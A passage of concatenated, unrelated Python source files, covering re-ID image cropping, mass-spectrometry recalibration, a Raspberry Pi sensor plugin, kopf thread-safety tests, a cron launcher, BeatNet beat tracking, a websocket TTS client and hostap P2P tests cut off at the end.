xmin, xmax, ymin, ymax = get_bbox('wait_to_crop_train/0010_c6s4_002427_07.xml')
img = cv2.imread(name)
#cv2.rectangle(img, (xmin,ymin),(xmax,ymax), (255,0,0),1)
img2 = img[ymin:ymax, xmin:xmax]
cv2.imshow('image', img2)
cv2.waitKey(0)
exit(0)
'''
image_list = glob.glob('wait_to_crop_test/*.jpg')
for name in image_list:
basename = os.path.basename(name)
img = cv2.imread(name)
if os.path.exists('wait_to_crop_test/'+basename[:-4]+'.xml'):
xmin, xmax, ymin, ymax = get_bbox('wait_to_crop_test/'+basename[:-4]+'.xml')
img = cv2.imread(name)
img2 = img[ymin:ymax, xmin:xmax]
cv2.imwrite('crop_test/'+basename, img2)
exit(0)
#split_direction()
image_map_direction = {}
direction_map_image = {}
img_list = []
save_dir = 'cuhk03_train_fixed2/'
direction_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise']
map_int = {'front':0,
'front_side': 0,
'side':1,
'noise':1,
'back': 2,
'back_side':2,}
map_int2 = {'front':0,
'front_side': 1,
'side':2,
'noise':5,
'back': 3,
'back_side':4,}
direction_int_list = []
direction_int_list2 = []
for i in direction_list:
image_list = os.listdir(save_dir+i)
direction_map_image[i] = image_list
for name in image_list:
image_map_direction[name] = (map_int[i], i)
direction_int_list.append(map_int[i])
direction_int_list2.append(map_int2[i])
if name[-8:] == '.jpg.jpg':
image_map_direction[name[:-4]] = (map_int[i], i)
print(name, name[:-4])
print(len(direction_int_list),
round(direction_int_list.count(0)/len(direction_int_list), 2),
round(direction_int_list.count(1)/len(direction_int_list), 2),
round(direction_int_list.count(2)/len(direction_int_list), 2))
print(set(direction_int_list))
print(len(direction_int_list2),
round(direction_int_list2.count(0)/len(direction_int_list2), 2),
round(direction_int_list2.count(1)/len(direction_int_list2), 2),
round(direction_int_list2.count(2)/len(direction_int_list2), 2),
round(direction_int_list2.count(3)/len(direction_int_list2), 2),
round(direction_int_list2.count(4)/len(direction_int_list2), 2),
round(direction_int_list2.count(5)/len(direction_int_list2), 2))
print(set(direction_int_list2))
save_file(image_map_direction, 'cuhk03_image_map_direction.pkl')
save_file(direction_map_image, 'cuhk03_direction_map_image.pkl')
save_file(image_map_direction, 'cuhk03_image_map_direction_py2.pkl', 2)
save_file(direction_map_image, 'cuhk03_direction_map_image_py2.pkl', 2)
print(len(image_map_direction))
exit(0)
print(image_map_direction)
exit(0)
image_map_direction = {}
direction_map_image = {}
save_dir = 'market1501_full_fixed2/'
direction_list = ['front', 'back', 'side', 'front_side', 'back_side', 'noise', 'null', 'error']
for i in direction_list:
image_list = os.listdir(save_dir+i)
exit(0)
exit(0)
#save_dir = 'DukeMTMC-reID_detail/'
save_dir = 'DukeMTMC-reID_detail/'
direction_list = ['front', 'back', 'side', 'front_side', 'back_side']
for i in direction_list:
listglob1 = glob.glob(save_dir+i+'/*.jpg')
for path in listglob1:
img = cv2.imread(path)
img = cv2.resize(img, ((50,120)))
cv2.imwrite(path, img)
#line = rect['path'] + "\t"+ rect['xmin']+ "\t"+rect['ymin']+"\t"+rect['xmax']+"\t"+rect['ymax']
|
recalibrate.py
|
import logging
from multiprocessing import JoinableQueue, Process
from pathlib import Path
from typing import Iterable, Union, Optional
import numpy as np
import pandas as pd
from pyimzml.ImzMLParser import ImzMLParser
from pyimzml.ImzMLWriter import ImzMLWriter
from msi_recal.evaluate import EvalPeaksCollector
from msi_recal.params import RecalParams
from msi_recal.passes.align_msiwarp import AlignMsiwarp
from msi_recal.passes.align_ransac import AlignRansac
from msi_recal.passes.normalize import Normalize
from msi_recal.passes.recal_msiwarp import RecalMsiwarp
from msi_recal.passes.recal_ransac import RecalRansac
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
logger = logging.getLogger(__name__)
TRANSFORM = {
'align_msiwarp': AlignMsiwarp,
'align_ransac': AlignRansac,
'recal_msiwarp': RecalMsiwarp,
'recal_ransac': RecalRansac,
'normalize': Normalize,
}
def get_spectra_df_from_parser(p: ImzMLParser, sp_idxs: Iterable[int]):
peaks_dfs = []
spectra = []
for i in sp_idxs:
mzs, ints = p.getspectrum(i)
x, y, z = p.coordinates[i]
mask = ints > 0
mzs = mzs[mask].astype(np.float64)
ints = ints[mask].astype(np.float32)
peaks_dfs.append(pd.DataFrame({'sp': i, 'mz': mzs, 'ints': ints}))
spectra.append((i, x, y, z, np.min(mzs), np.max(mzs), np.sum(ints)))
peaks_df = pd.concat(peaks_dfs)
spectra_df = pd.DataFrame(
spectra, columns=['sp', 'x', 'y', 'z', 'mz_lo', 'mz_hi', 'tic']
).set_index('sp')
return peaks_df, spectra_df
def get_sample_spectra_df_from_parser(p: ImzMLParser, n_samples=200):
sp_n = len(p.coordinates)
sp_idxs = np.sort(np.random.choice(sp_n, min(n_samples, sp_n), False))
return get_spectra_df_from_parser(p, sp_idxs)
def build_pipeline(sample_peaks_df: pd.DataFrame, params: RecalParams, cache_path: Optional[Path]):
models = []
stages = [
('initial', sample_peaks_df),
]
for tf_name, *tf_args in params.transforms:
logger.info(f'Fitting {tf_name} model')
assert tf_name in TRANSFORM, f'Unrecognized transform "{tf_name}"'
tf = TRANSFORM[tf_name](params, *tf_args)
loaded_cache = False
if cache_path is not None:
try:
tf.load_cache(f'{cache_path}/{tf_name}')
loaded_cache = True
logger.debug(f'{tf_name} loaded from cache')
except (IOError, EOFError):
logger.debug(f'{tf_name} not cached')
if not loaded_cache:
tf.fit(sample_peaks_df)
sample_peaks_df = tf.predict(sample_peaks_df)
models.append(tf)
stages.append((tf_name, sample_peaks_df))
# Hacky progress report
eval = EvalPeaksCollector(sample_peaks_df, params)
for stage_name, stage_df in stages:
eval.collect_peaks(stage_df, stage_name)
logger.debug(
pd.DataFrame(
{stage_name: eval.get_stats(stage_name).abs().mean() for stage_name, stage_df in stages}
)
)
eval.reset()
return models, eval
def _imzml_writer_process(output_path, queue):
with ImzMLWriter(output_path) as writer:
while True:
job = queue.get()
queue.task_done()
if job is not None:
for mzs, ints, coord in job:
writer.addSpectrum(mzs, ints, coord)
if job is None:
return
def _null_writer_process(output_path, queue):
while queue.get() is not None:
queue.task_done()
queue.task_done()
def process_imzml_file(
input_path: Union[str, Path],
params: RecalParams,
output_path: Union[str, Path, None, Literal['infer']] = 'infer',
debug_path: Union[str, Path, None, Literal['infer']] = 'infer',
cache_path: Union[str, Path, None, Literal['infer']] = 'infer',
samples: int = 100,
limit: int = None,
):
input_path = Path(input_path)
if output_path == 'infer':
output_path = Path(f'{input_path.parent}/{input_path.stem}_recal.imzML')
if debug_path == 'infer':
debug_path = Path(f'{input_path.parent}/{input_path.stem}_debug/')
if cache_path == 'infer':
cache_path = Path(f'{input_path.parent}/{input_path.stem}_cache/')
cache_path.mkdir(parents=True, exist_ok=True)
cache_path = Path(cache_path) if cache_path is not None else None
p = ImzMLParser(str(input_path), parse_lib="ElementTree")
sample_peaks_df, sample_spectra_df = get_sample_spectra_df_from_parser(p, n_samples=samples)
models, eval = build_pipeline(sample_peaks_df, params, cache_path)
writer_queue = JoinableQueue(2)
writer_func = _imzml_writer_process if output_path else _null_writer_process
writer_process = Process(target=writer_func, args=(output_path, writer_queue))
writer_process.start()
all_spectra_dfs = []
try:
chunk_size = 1000
if limit:
skip = max(0, (len(p.coordinates) - limit) // 2)
sp_n = min(limit, len(p.coordinates) - skip)
else:
skip = 0
sp_n = len(p.coordinates)
for start_i in range(skip, skip + sp_n, chunk_size):
end_i = min(start_i + chunk_size, len(p.coordinates))
if start_i >= end_i:
continue
logger.debug(f'Reading spectra {start_i}-{end_i} out of {len(p.coordinates)}')
peaks_df, spectra_df = get_spectra_df_from_parser(p, np.arange(start_i, end_i))
eval.collect_peaks(peaks_df, 'before')
# Convert to tuples, because spectra_df.loc coalesces everything into floats
spectra_dict = {row[0]: row for row in spectra_df.itertuples()}
all_spectra_dfs.append(spectra_df)
logger.info(f'Transforming spectra {start_i}-{end_i}')
for model in models:
peaks_df = model.predict(peaks_df)
eval.collect_peaks(peaks_df, 'after')
writer_job = []
for sp, grp in peaks_df.groupby('sp'):
spectrum = spectra_dict[sp]
writer_job.append((grp.mz, grp.ints, (spectrum.x, spectrum.y, spectrum.z)))
logger.debug(f'Writing spectra {start_i}-{end_i}')
writer_queue.put(writer_job)
if cache_path:
for model in models:
model.save_cache()
except KeyboardInterrupt:
pass # Don't rethrow - save the debug data if possible
finally:
writer_queue.put(None)
writer_queue.close()
writer_queue.join()
writer_process.join()
logger.info(f'Finished writing {output_path}')
if debug_path:
debug_path.mkdir(parents=True, exist_ok=True)
existing_debug_files = [p for p in debug_path.iterdir() if p.is_file()]
if existing_debug_files:
logger.info(f'Cleaning debug output directory')
for file in existing_debug_files:
file.unlink()
logger.info(f'Writing debug output to {debug_path}')
(debug_path / 'params.txt').open('wt').write(repr(params))
all_spectra_df = pd.concat(all_spectra_dfs)
for i, ((transform_name, *_), model) in enumerate(zip(params.transforms, models)):
try:
if hasattr(model, 'save_debug'):
model.save_debug(all_spectra_df, str(debug_path / f'{i}_{transform_name}'))
except:
logger.warning(f'{transform_name} error', exc_info=True)
eval.get_report().to_csv(debug_path / 'evaluation_peaks.csv')
return eval
|
rpigpio.py
|
from apama.eplplugin import EPLAction, EPLPluginBase, Correlator, Event, Any
from gpiozero import LightSensor
import threading, queue
class Job(object):
"""
Jobs to be executed asynchronously
@param fn a functor to execute
"""
def __init__(self, pin, threshold, fn):
self.pin = pin
self.threshold = threshold
self.fn = fn
def iothread(plugin):
"""
Background thread to execute async jobs on.
"""
plugin.getLogger().debug("Starting background IO thread for asynchronous jobs")
ldrs = {}
while plugin.running:
try:
job = plugin.queue.get(timeout=1.0)
ldrs[job.pin] = (LightSensor(job.pin), job.threshold, job.fn, job.threshold)
except queue.Empty:
pass
except Exception as e:
plugin.getLogger().error("Exception adding light sensor: "+e)
try:
for p in ldrs:
(pin, threshold, fn, oldvalue) = ldrs[p]
v = pin.value
if v > threshold and oldvalue < threshold or v < threshold and oldvalue > threshold:
fn(v)
ldrs[p] = (pin, threshold, fn, v)
except Exception as e:
plugin.getLogger().error("Exception checking light sensors: "+e)
plugin.getLogger().info("iothread done")
class RPiGPIOPluginClass(EPLPluginBase):
"""
"""
def __init__(self, init):
super(RPiGPIOPluginClass, self).__init__(init)
self.running = True
self.queue = queue.SimpleQueue()
self.thread = threading.Thread(target=iothread, args=[self], name='Apama RPiGPIOPluginClass io thread')
self.thread.start()
def _sendResponseEvent(self, channel, eventType, body):
Correlator.sendTo(channel, Event(eventType, body))
@EPLAction("action<integer, float, string>")
def startLightSensor(self, pin, threshold, channel):
self.queue.put(Job(pin, threshold,
lambda newvalue: self._sendResponseEvent(channel, "com.apamax.LightThreshold", {
"pin": pin,
"threshold": threshold,
"value": newvalue,
"state": True if newvalue>threshold else False,
})
))
@EPLAction("action<>")
def shutdown(self):
"""
Plug-in function to shutdown the background thread.
"""
self.getLogger().debug(f"Shutting down RPi GPIO plug-in")
self.running = False
self.thread.join()
|
test_threadsafety.py
|
"""
A little note on how these tests work:
Almost all asyncio objects are not thread-safe, as per the official doc.
This includes `asyncio.Queue`. This queue is used for k8s-event posting.
K8s-events are posted via ``kopf.event()`` and similar calls,
and also via ``logger.info()`` for per-object logging messages.
The calls originate from various threads:
* Main thread where the framework's event-loop runs.
* Thread-pool executors for sync handlers.
* Explicitly started threads for object monitoring
(e.g. from ``@kopf.on.resume`` handlers).
In the main thread, there is an event-loop running, and it has an asyncio task
to get the k8s-event events from the queue and to post them to the K8s API.
In the non-thread-safe mode, putting an object via `queue.put_nowait()``
does **NOT** wake up the pending ``queue.get()`` in the `poster` task
until something happens on the event-loop (not necessary on the queue).
In the thread-safe mode, putting an an object via `queue.put()``
(which is a coroutine and must be executed in the loop)
wakes the pending ``queue.get()`` call immediately.
These tests ensure that the thread-safe calls are used for k8s-event posting
by artificially reproducing the described situation. The delayed no-op task
(awakener) is used to wake up the event-loop after some time if the k8s-event
posting is not thread-safe. Otherwise, it wakes up on ``queue.get()`` instantly.
If thread safety is not ensured, the operators get sporadic errors regarding
thread-unsafe calls, which are difficult to catch and reproduce.
"""
import asyncio
import contextvars
import functools
import threading
import time
import pytest
from kopf import event
OBJ1 = {'apiVersion': 'group1/version1', 'kind': 'Kind1',
'metadata': {'uid': 'uid1', 'name': 'name1', 'namespace': 'ns1'}}
@pytest.fixture()
def awakener(event_loop):
handles = []
def noop():
pass
def awaken_fn(delay, fn=noop):
handle = event_loop.call_later(delay, fn)
handles.append(handle)
try:
yield awaken_fn
finally:
for handle in handles:
handle.cancel()
@pytest.fixture()
def threader():
threads = []
def start_fn(delay, fn):
def thread_fn():
time.sleep(delay)
fn()
target = functools.partial(contextvars.copy_context().run, thread_fn)
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
try:
yield start_fn
finally:
for thread in threads:
thread.join()
async def test_nonthreadsafe_indeed_fails(timer, awakener, threader, event_queue, event_queue_loop):
def thread_fn():
event_queue.put_nowait(object())
awakener(0.7)
threader(0.3, thread_fn)
with timer:
await event_queue.get()
assert 0.6 <= timer.seconds <= 0.8
async def test_threadsafe_indeed_works(timer, awakener, threader, event_queue, event_queue_loop):
def thread_fn():
asyncio.run_coroutine_threadsafe(event_queue.put(object()), loop=event_queue_loop)
awakener(0.7)
threader(0.3, thread_fn)
with timer:
await event_queue.get()
assert 0.2 <= timer.seconds <= 0.4
async def test_queueing_is_threadsafe(timer, awakener, threader, event_queue, event_queue_loop,
settings_via_contextvar):
def thread_fn():
event(OBJ1, type='type1', reason='reason1', message='message1')
awakener(0.7)
threader(0.3, thread_fn)
with timer:
await event_queue.get()
assert 0.2 <= timer.seconds <= 0.4
|
cron_app.py
|
#encoding:utf-8
import datetime
import csv
import logging
from multiprocessing import Process
import time
import yaml
from croniter import croniter
from supplier import supply
logger = logging.getLogger(__name__)
def read_own_cron(own_cron_filename, config):
with open(own_cron_filename) as tsv_file:
tsv_reader = csv.DictReader(tsv_file, delimiter='\t')
for row in tsv_reader:
now = datetime.datetime.now()
cron = croniter(row['MASK'])
# prev_run = cron.get_current(datetime.datetime)
prev_run = cron.get_prev(datetime.datetime)
prev_run = cron.get_next(datetime.datetime)
diff = now - prev_run
diff_seconds = diff.total_seconds()
if diff_seconds >= 0.0 and diff_seconds <= 59.9:
# print(row['submodule_name'], diff_seconds)
# supply(row['submodule_name'], config)
supplying_process = Process(target=supply, args=(row['submodule_name'], config))
supplying_process.start()
time.sleep(2)
def main(config_filename):
with open(config_filename) as config_file:
config = yaml.load(config_file.read())
read_own_cron(config['cron_file'], config)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--config', default='configs/prod.yml')
args = parser.parse_args()
main(args.config)
|
BeatNet.py
|
# This is the BeatNet user script. First, it extracts the spectral features and then
# feeds them to one of the pre-trained models to get beat/downbeat activations.
# Therefore, it infers beats and downbeats based on one of the two offline and online inference models.
import os
import torch
import numpy as np
from madmom.features import DBNDownBeatTrackingProcessor
from BeatNet.particle_filtering_cascade import particle_filter_cascade
from BeatNet.log_spect import LOG_SPECT
import librosa
import sys
from BeatNet.model import BDA
import pyaudio
import matplotlib.pyplot as plt
import time
import threading
class BeatNet:
'''
The main BeatNet handler class including different trained models, different modes for extracting the activation and causal and non-causal inferences
Parameters
----------
Inputs:
model: An scalar in the range [1,3] to select which pre-trained CRNN models to utilize.
mode: An string to determine the working mode. i.e. 'stream', 'realtime', 'online' and ''offline.
'stream' mode: Uses the system microphone to capture sound and does the process in real-time. Due to training the model on standard mastered songs, it is highly recommended to make sure the microphone sound is as loud as possible. Less reverbrations leads to the better results.
'Realtime' mode: Reads an audio file chunk by chunk, and processes each chunck at the time.
'Online' mode: Reads the whole audio and feeds it into the BeatNet CRNN at the same time and then infers the parameters on interest using particle filtering.
'offline' mode: Reads the whole audio and feeds it into the BeatNet CRNN at the same time and then inferes the parameters on interest using madmom dynamic Bayesian network. This method is quicker that madmom beat/downbeat tracking.
inference model: A string to choose the inference approach. i.e. 'PF' standing for Particle Filtering for causal inferences and 'DBN' standing for Dynamic Bayesian Network for non-causal usages.
plot: A list of strings to plot.
'activations': Plots the neural network activations for beats and downbeats of each time frame.
'beat_particles': Plots beat/tempo tracking state space and current particle states at each time frame.
'downbeat_particles': Plots the downbeat/meter tracking state space and current particle states at each time frame.
Note that to speedup plotting the figures, rather than new plots per frame, the previous plots get updated. However, to secure realtime results, it is recommended to not plot or have as less number of plots as possible at the time.
threading: To decide whether accomplish the inference at the main thread or another thread.
Outputs:
A vector including beat times and downbeat identifier columns, respectively with the following shape: numpy_array(num_beats, 2).
'''
def __init__(self, model, mode='online', inference_model='PF', plot=[], thread=False):
self.model = model
self.mode = mode
self.inference_model = inference_model
self.plot= plot
self.thread = thread
if plot and thread:
raise RuntimeError('Plotting cannot be accomplished in the threading mode')
self.sample_rate = 22050
self.log_spec_sample_rate = self.sample_rate
self.log_spec_hop_length = int(20 * 0.001 * self.log_spec_sample_rate)
self.log_spec_win_length = int(64 * 0.001 * self.log_spec_sample_rate)
self.proc = LOG_SPECT(sample_rate=self.log_spec_sample_rate, win_length=self.log_spec_win_length,
hop_size=self.log_spec_hop_length, n_bands=[24], mode = self.mode)
if self.inference_model == "PF": # instantiating a Particle Filter decoder - Is Chosen for online inference
self.estimator = particle_filter_cascade(beats_per_bar=[], fps=50, plot=self.plot, mode=self.mode)
elif self.inference_model == "DBN": # instantiating an HMM decoder - Is chosen for offline inference
self.estimator = DBNDownBeatTrackingProcessor(beats_per_bar=[2, 3, 4], fps=50)
else:
raise RuntimeError('inference_model can be either "PF" or "DBN"')
script_dir = os.path.dirname(__file__)
#assiging a BeatNet CRNN instance to extract joint beat and downbeat activations
self.model = BDA(272, 150, 2, 'cpu') #Beat Downbeat Activation detector
#loading the pre-trained BeatNet CRNN weigths
if model == 1: # GTZAN out trained model
self.model.load_state_dict(torch.load(os.path.join(script_dir, 'models/model_1_weights.pt')), strict=False)
elif model == 2: # Ballroom out trained model
self.model.load_state_dict(torch.load(os.path.join(script_dir, 'models/model_2_weights.pt')), strict=False)
elif model == 3: # Rock_corpus out trained model
self.model.load_state_dict(torch.load(os.path.join(script_dir, 'models/model_3_weights.pt')), strict=False)
else:
raise RuntimeError(f'Failed to open the trained model: {model}')
self.model.eval()
if self.mode == 'stream':
self.stream_window = np.zeros(self.log_spec_win_length + 2 * self.log_spec_hop_length, dtype=np.float32)
self.stream = pyaudio.PyAudio().open(format=pyaudio.paFloat32,
channels=1,
rate=self.sample_rate,
input=True,
frames_per_buffer=self.log_spec_hop_length,)
def process(self, audio_path=None):
if self.mode == "stream":
if self.inference_model != "PF":
raise RuntimeError('The infernece model should be set to "PF" for the streaming mode!')
self.counter = 0
while self.stream.is_active():
self.activation_extractor_stream() # Using BeatNet casual Neural network streaming mode to extract activations
if self.thread:
x = threading.Thread(target=self.estimator.process, args=(self.pred), daemon=True) # Processing the inference in another thread
x.start()
x.join()
else:
output = self.estimator.process(self.pred)
self.counter += 1
elif self.mode == "realtime":
self.counter = 0
self.completed = 0
if self.inference_model != "PF":
raise RuntimeError('The infernece model for the streaming mode should be set to "PF".')
if audio_path != None:
while self.completed == 0:
self.activation_extractor_realtime(audio_path) # Using BeatNet casual Neural network realtime mode to extract activations
if self.thread:
x = threading.Thread(target=self.estimator.process, args=(self.pred), daemon=True) # Processing the inference in another thread
x.start()
x.join()
else:
output = self.estimator.process(self.pred) # Using particle filtering online inference to infer beat/downbeats
self.counter += 1
return output
else:
raise RuntimeError('An audio object or file directory is required for the realtime usage!')
elif self.mode == "online":
if audio_path != None:
preds = self.activation_extractor_online(audio_path) # Using BeatNet casual Neural network to extract activations
else:
raise RuntimeError('An audio object or file directory is required for the online usage!')
if self.inference_model == "PF": # Particle filtering inference (causal)
print('.....__running_particle_inferene__.....')
output = self.estimator.process(preds) # Using particle filtering online inference to infer beat/downbeats
return output
elif self.inference_model == "DBN": # Dynamic bayesian Network Inference (non-causal)
output = self.estimator(preds) # Using DBN offline inference to infer beat/downbeats
return output
elif self.mode == "offline":
if self.inference_model != "DBN":
raise RuntimeError('The infernece model should be set to "DBN" for the offline mode!')
if audio_path != None:
preds = self.activation_extractor_online(audio_path) # Using BeatNet casual Neural network to extract activations
output = self.estimator(preds) # Using DBN offline inference to infer beat/downbeats
return output
else:
raise RuntimeError('An audio object or file directory is required for the offline usage!')
def activation_extractor_stream(self):
# TODO:
''' Streaming window
Given the training input window's origin set to center, this streaming data formation causes 0.084 (s) delay compared to the trained model that needs to be fixed.
'''
with torch.no_grad():
hop = self.stream.read(self.log_spec_hop_length)
hop = np.frombuffer(hop, dtype=np.float32)
self.stream_window = np.append(self.stream_window[self.log_spec_hop_length:], hop)
if self.counter < 5:
self.pred = np.zeros([1,2])
else:
feats = self.proc.process_audio(self.stream_window).T[-1]
feats = torch.from_numpy(feats)
feats = feats.unsqueeze(0).unsqueeze(0)
pred = self.model(feats)[0]
pred = self.model.final_pred(pred)
pred = pred.detach().numpy()
self.pred = np.transpose(pred[:2, :])
def activation_extractor_realtime(self, audio_path):
with torch.no_grad():
if self.counter==0: #loading the audio
if isinstance(audio_path, str):
self.audio, _ = librosa.load(audio_path, sr=self.sample_rate) # reading the data
else:
self.audio = audio_path
if self.counter<(round(len(self.audio)/self.log_spec_hop_length)):
if self.counter<2:
self.pred = np.zeros([1,2])
else:
feats = self.proc.process_audio(self.audio[self.log_spec_hop_length * (self.counter-2):self.log_spec_hop_length * (self.counter) + self.log_spec_win_length]).T[-1]
feats = torch.from_numpy(feats)
feats = feats.unsqueeze(0).unsqueeze(0)
pred = self.model(feats)[0]
pred = self.model.final_pred(pred)
pred = pred.detach().numpy()
self.pred = np.transpose(pred[:2, :])
else:
self.completed = 1
def activation_extractor_online(self, audio_path):
with torch.no_grad():
if isinstance(audio_path, str):
audio, _ = librosa.load(audio_path, sr=self.sample_rate) # reading the data
else:
audio = audio_path
feats = self.proc.process_audio(audio).T
print('input_feats_shape_T',feats.shape)
feats = torch.from_numpy(feats)
feats = feats.unsqueeze(0)
preds = self.model(feats)[0] # extracting the activations by passing the feature through the NN and [0] for making shape independent of batchsize
print(preds.shape)
# print(preds)
preds = self.model.final_pred(preds)
# print(preds)
preds = preds.detach().numpy()
preds = np.transpose(preds[:2, :])
print(preds.shape)
return preds
|
ws_client_playaudio.py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import _thread as thread
import argparse
import base64
import json
import ssl
import threading
import time
import pyaudio
import websocket
mutex = threading.Lock()
buffer = b''
p = pyaudio.PyAudio()
stream = p.open(
format=p.get_format_from_width(2), channels=1, rate=24000, output=True)
flag = 1
st = 0.0
all_bytes = 0.0
class WsParam(object):
# 初始化
def __init__(self, text, server="127.0.0.1", port=8090):
self.server = server
self.port = port
self.url = "ws://" + self.server + ":" + str(self.port) + "/ws/tts"
self.text = text
# 生成url
def create_url(self):
return self.url
def play_audio():
global stream
global buffer
while True:
time.sleep(0.05)
if not buffer: # buffer 为空
break
mutex.acquire()
stream.write(buffer)
buffer = b''
mutex.release()
t = threading.Thread(target=play_audio)
def on_message(ws, message):
global flag
global t
global buffer
global st
global all_bytes
try:
message = json.loads(message)
audio = message["audio"]
audio = base64.b64decode(audio) # bytes
status = message["status"]
all_bytes += len(audio)
if status == 0:
print("create successfully.")
elif status == 1:
mutex.acquire()
buffer += audio
mutex.release()
if flag:
print(f"首包响应:{time.time() - st} s")
flag = 0
print("Start playing audio")
t.start()
elif status == 2:
final_response = time.time() - st
duration = all_bytes / 2 / 24000
print(f"尾包响应:{final_response} s")
print(f"音频时长:{duration} s")
print(f"RTF: {final_response / duration}")
print("ws is closed")
ws.close()
else:
print("infer error")
except Exception as e:
print("receive msg,but parse exception:", e)
# 收到websocket错误的处理
def on_error(ws, error):
print("### error:", error)
# 收到websocket关闭的处理
def on_close(ws):
print("### closed ###")
# 收到websocket连接建立的处理
def on_open(ws):
def run(*args):
global st
text_base64 = str(
base64.b64encode((wsParam.text).encode('utf-8')), "UTF8")
d = {"text": text_base64}
d = json.dumps(d)
print("Start sending text data")
st = time.time()
ws.send(d)
thread.start_new_thread(run, ())
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--text",
type=str,
help="A sentence to be synthesized",
default="您好,欢迎使用语音合成服务。")
parser.add_argument(
"--server", type=str, help="server ip", default="127.0.0.1")
parser.add_argument("--port", type=int, help="server port", default=8092)
args = parser.parse_args()
print("***************************************")
print("Server ip: ", args.server)
print("Server port: ", args.port)
print("Sentence to be synthesized: ", args.text)
print("***************************************")
wsParam = WsParam(text=args.text, server=args.server, port=args.port)
websocket.enableTrace(False)
wsUrl = wsParam.create_url()
ws = websocket.WebSocketApp(
wsUrl, on_message=on_message, on_error=on_error, on_close=on_close)
ws.on_open = on_open
ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
t.join()
print("End of playing audio")
stream.stop_stream()
stream.close()
p.terminate()
|
test_p2p_grpform.py
|
# P2P group formation test cases
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import time
import threading
import Queue
import os
import hostapd
import hwsim_utils
import utils
from utils import HwsimSkip
from wpasupplicant import WpaSupplicant
def check_grpform_results(i_res, r_res):
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("freq mismatch")
if 'go_neg_freq' in r_res and i_res['go_neg_freq'] != r_res['go_neg_freq']:
raise Exception("go_neg_freq mismatch")
if i_res['freq'] != i_res['go_neg_freq']:
raise Exception("freq/go_neg_freq mismatch")
if i_res['role'] != i_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if 'go_neg_role' in r_res and r_res['role'] != r_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=20)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display', test_data=True, i_freq=None, r_freq=None):
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent, expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
if test_data:
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
return [i_res, r_res]
def go_neg_init_pbc(i_dev, r_dev, i_intent, res, freq, provdisc):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc",
timeout=20, go_intent=i_intent, freq=freq,
provdisc=provdisc)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init_pbc thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None, i_freq=None, r_freq=None, provdisc=False, r_listen=False):
if r_listen:
r_dev.p2p_listen()
else:
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
